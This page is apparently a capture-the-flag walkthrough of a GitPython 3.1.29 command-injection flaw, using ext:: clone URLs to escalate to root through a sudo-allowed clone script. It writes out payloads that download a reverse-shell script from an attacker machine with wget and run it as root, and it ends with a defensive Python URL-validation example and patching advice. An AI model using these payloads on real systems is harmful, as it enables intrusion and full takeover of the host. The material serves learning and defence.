About
Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments: a URL beginning with ext:: is handed to git-remote-ext, which executes the rest of the string as a command. This is only relevant when the ext transport protocol is enabled (protocol.ext.allow); git sets it to never by default, so the calling code has to opt in.
- Ext Transport protocol
References
Walkthrough
Narrative:
The target runs GitPython version 3.1.29, which is vulnerable to this CVE (the check for unsafe transports was added in 3.1.30).
An unprivileged user has sudo permissions to run, as root, a python script that clones a remote repository given on the command line:
prod@editorial:~$ sudo -l
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
Contents of /opt/internal_apps/clone_changes/clone_prod_change.py:
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
The script passes sys.argv[1] straight to clone_from and, through multi_options, explicitly enables the ext transport with -c protocol.ext.allow=always, so git will honour an ext:: URL. git-remote-ext splits the text after ext:: on spaces into a command and its arguments; "% " is the escape for a literal space inside one argument. The original PoC therefore becomes sh -c "touch /tmp/pwned":
'ext::sh -c touch% /tmp/pwned'
We can then set our own arguments. First, fetch a reverse-shell script from our machine (wget -O writes the download to the given path; a plain > redirect would only capture wget's empty stdout, since wget reports on stderr and saves the file under the URL's name):
'ext::sh -c wget% http://our-machine/reverse-shell.sh% -O% /tmp/r.sh'
Each payload is passed as the script's single argument; the trailing * in the sudo rule accepts any value, and because the clone runs as root so does the command. The final step executes the fetched script:
# Executing a Reverse Shell, as root:
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/r.sh'
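To make the two halves of this chain concrete, here is an added example (not code from GitPython, git or the target's clone_prod_change.py): ext_argv emulates the argument splitting git-remote-ext applies to an ext:: URL, so you can see exactly which argv the payloads above turn into, and is_safe_clone_url is the allow-list gate a wrapper like clone_prod_change.py should apply to sys.argv[1] before it ever reaches clone_from. Both function names, the regexes and the sample URLs are assumptions made for this page; the escaping rules follow the git-remote-ext(1) documentation ("% " is a literal space, "%%" a literal percent, other %-sequences are substituted by git).

```python
from __future__ import annotations
import re

# Added example, not GitPython or git code. Names and patterns are hypothetical.

# Only plain https/ssh/git URLs or scp-style user@host:path are accepted.
SAFE_URL = re.compile(r"^(https?|ssh|git)://[^\s]+$|^[\w.-]+@[\w.-]+:[^\s]+$")
# "<helper>::..." makes git run git-remote-<helper>; ext:: and fd:: are the dangerous ones.
HELPER_SYNTAX = re.compile(r"^[A-Za-z0-9+.-]*::")


def ext_argv(url: str) -> list[str]:
    """Split the text after 'ext::' the way git-remote-ext does.

    An unescaped space ends an argument, '% ' is a literal space, '%%' a
    literal percent sign; other %-sequences (%S, %s, %G, %V) are kept as-is
    because git substitutes them itself. Empty arguments are dropped.
    """
    if not url.startswith("ext::"):
        raise ValueError("not an ext:: URL")
    body = url[len("ext::"):]
    argv, cur, i = [], "", 0
    while i < len(body):
        ch = body[i]
        if ch == "%" and i + 1 < len(body):
            nxt = body[i + 1]
            cur += {" ": " ", "%": "%"}.get(nxt, "%" + nxt)
            i += 2
        elif ch == " ":
            if cur:
                argv.append(cur)
                cur = ""
            i += 1
        else:
            cur += ch
            i += 1
    if cur:
        argv.append(cur)
    return argv


def is_safe_clone_url(url: str) -> bool:
    """Allow-list gate for a URL that will be passed to Repo.clone_from.

    Rejects remote-helper syntax (ext::, fd::, anything::), option-looking
    arguments (which git would parse as flags) and bare local paths, so git
    never gets to choose a transport helper on the caller's behalf.
    """
    if url.startswith("-") or HELPER_SYNTAX.match(url):
        return False
    return SAFE_URL.match(url) is not None


if __name__ == "__main__":
    # The payloads from the walkthrough, as git-remote-ext would see them.
    for payload in (
        "ext::sh -c touch% /tmp/pwned",
        "ext::sh -c wget% http://our-machine/reverse-shell.sh% -O% /tmp/r.sh",
        "ext::sh -c bash% /tmp/r.sh",
    ):
        print(f"{payload!r:70} -> argv {ext_argv(payload)}  safe={is_safe_clone_url(payload)}")
    # Constructed legitimate URLs the gate should let through.
    for ok in ("https://github.com/gitpython-developers/GitPython.git",
               "git@github.com:gitpython-developers/GitPython.git"):
        print(f"{ok!r:70} safe={is_safe_clone_url(ok)}")
```

In a wrapper like clone_prod_change.py the gate belongs in front of clone_from, and the -c protocol.ext.allow=always option should be dropped altogether; upgrading GitPython to 3.1.30 or later adds the library's own refusal of ext:: and fd:: URLs (overridable only via the allow_unsafe_protocols parameter of clone_from), but a root-level sudo wrapper should not rely on the library alone.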
Proof of concept: